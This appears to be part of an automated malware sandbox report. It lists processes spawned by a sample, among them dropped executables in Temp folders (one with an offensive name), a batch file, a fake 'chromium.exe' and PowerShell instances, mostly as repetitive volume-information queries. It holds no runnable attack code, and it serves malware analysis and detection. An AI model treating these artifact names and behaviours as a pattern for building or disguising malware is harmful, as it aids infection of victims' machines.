Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\5c9465cda4.exe

0_2_00AD0B62

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AD1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00AD1663

Source: 5c9465cda4.exe, 00000000.00000000.1664651285.0000000000B32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: rapes.exe, rapes.exe, 0000000C.00000002.1807867584.0000000000870000.00000040.00000001.01000000.0000000F.sdmp, TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000002.1829358941.0000000000AF0000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: =8Program Manager
Source: 5c9465cda4.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A90698 cpuid

0_2_00A90698

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106740101\f5042cb50f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10106740101\f5042cb50f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10102370101 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
